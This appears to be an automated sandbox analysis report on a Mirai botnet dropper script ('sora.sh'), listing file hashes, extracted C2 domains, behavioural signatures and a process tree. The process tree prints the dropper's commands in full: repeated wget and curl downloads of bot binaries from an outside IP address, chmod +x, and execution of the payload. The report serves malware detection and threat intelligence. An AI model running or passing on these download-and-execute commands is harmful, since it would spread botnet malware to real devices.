Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240418-en
  • resource tags

    arch:mips
    image:debian9-mipsbe-20240418-en
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mips
    system
  • submitted
    29-12-2024 21:33

General

  • Target

    51.79.141.121-sora.sh-2024-12-29T211113.sh

  • Size

    2KB

  • MD5

    0569b09a5951d5fe444efa1892b87687

  • SHA1

    0d3df40a37ec718be33d83c1c9a962e982a51d17

  • SHA256

    6c568bd265a5c182913cd277c88a151c797dfeb05244edaf156dea1b389a0baa

  • SHA512

    fbdf5cd3d7ee86f61d205e2745661444152304f594c73562a5b7d59adfdfed3adadbb59954afb7618f64d29e283ef15e1dfaf82cef3a79dc74c08cda5580b11d

Malware Config

Extracted

Family

mirai

Botnet

CONDI

C2

botnet.tfmobile.store

report.tfmobile.store

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Mirai family
  • Contacts a large (39150) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • File and Directory Permissions Modification 1 TTPs 10 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Executes dropped EXE 10 IoCs
  • Modifies Watchdog functionality 1 TTPs 18 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • Enumerates active TCP sockets 1 TTPs 8 IoCs

    Gets active TCP sockets from /proc virtual filesystem.

  • Writes file to system bin folder 9 IoCs
  • Changes its process name 9 IoCs
  • Reads system network configuration 1 TTPs 8 IoCs

    Uses contents of /proc filesystem to enumerate network settings.

  • Reads runtime system information 10 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 3 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to tmp directory 17 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    /tmp/51.79.141.121-sora.sh-2024-12-29T211113.sh
    1⤵
    • Writes file to tmp directory
    PID:711
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.x86
      2⤵
      • Writes file to tmp directory
      PID:714
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:740
    • /bin/cat
      cat botx.x86
      2⤵
      PID:741
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.x86 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
      2⤵
      • File and Directory Permissions Modification
      PID:742
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      PID:743
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.mips
      2⤵
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:745
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.mips
      2⤵
      • Reads runtime system information
      • System Network Configuration Discovery
      • Writes file to tmp directory
      PID:752
    • /bin/cat
      cat botx.mips
      2⤵
      • System Network Configuration Discovery
      PID:773
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
      2⤵
      • File and Directory Permissions Modification
      PID:774
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Writes file to system bin folder
      • Changes its process name
      PID:775
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.x86_64
      2⤵
      PID:778
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.x86_64
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:788
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.mips botx.x86 botx.x86_64 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
      2⤵
      • File and Directory Permissions Modification
      PID:801
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:802
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.i468
      2⤵
      PID:834
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.i468
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:835
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.mips botx.x86 botx.x86_64 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
      2⤵
      • File and Directory Permissions Modification
      PID:839
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:840
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.i686
      2⤵
      PID:842
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.i686
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:843
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.x86 botx.x86_64 robben systemd-private-6fdb548480c14ad9972058694c9a60e3-systemd-timedated.service-Zmfqv6
      2⤵
      • File and Directory Permissions Modification
      PID:847
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:848
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.mpsl
      2⤵
      • Writes file to tmp directory
      PID:853
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.mpsl
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:856
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
      2⤵
      • File and Directory Permissions Modification
      PID:858
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:859
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.arm4
      2⤵
      PID:861
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.arm4
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:862
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
      2⤵
      • File and Directory Permissions Modification
      PID:866
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:867
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.arm5
      2⤵
      • Writes file to tmp directory
      PID:869
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.arm5
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:872
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
      2⤵
      • File and Directory Permissions Modification
      PID:874
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:875
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.arm6
      2⤵
      • Writes file to tmp directory
      PID:877
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.arm6
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:880
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
      2⤵
      • File and Directory Permissions Modification
      PID:882
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:883
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.arm7
      2⤵
      • Writes file to tmp directory
      PID:885
    • /usr/bin/curl
      curl -O http://51.79.141.121/where/botx.arm7
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:888
    • /bin/chmod
      chmod +x 51.79.141.121-sora.sh-2024-12-29T211113.sh botx.arm4 botx.arm5 botx.arm6 botx.arm7 botx.i468 botx.i686 botx.mips botx.mpsl botx.x86 botx.x86_64 robben
      2⤵
      • File and Directory Permissions Modification
      PID:890
    • /tmp/robben
      ./robben Payload
      2⤵
      • Executes dropped EXE
      • Modifies Watchdog functionality
      • Enumerates active TCP sockets
      • Writes file to system bin folder
      • Changes its process name
      • Reads system network configuration
      PID:891
    • /usr/bin/wget
      wget http://51.79.141.121/where/botx.ppc
      2⤵
      PID:893

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /tmp/botx.x86

    Filesize

    50KB

    MD5

    1092f7846a6ca7a5e92ece0ea93ff82e

    SHA1

    140fd3e84c49d382e6b0f9a40730d1cd465f8347

    SHA256

    a5ddb64df4b96bfeae6860981f98b4845df83db34ffaf238548bede6067f15c2

    SHA512

    11ba6cdfba1784d5f2895f351def8d6a4dc0d5efd56b735978d1ff7416d2a52da07931250f37311362c8d522f7db89e3ac8bf1de890302afa6281ce2a2f6b2ba

  • /tmp/robben

    Filesize

    71KB

    MD5

    b5aeba1a09f5198a71db73371f6e01b6

    SHA1

    246b98370fdf429e94ab4ca087828acabbbebd9c

    SHA256

    7a81d936e21b859c70565eddf8e6e50658f6dff077a53adb0ec3cf313ce9f71f

    SHA512

    68db247b59d9fe3e030d56e48f2032c6e0d4bf203aef4e850da7dcda7185e60370fa577f2b97f9b6026b0599ae35ecca9fb48c8ace300d9820fb6a16b5722c57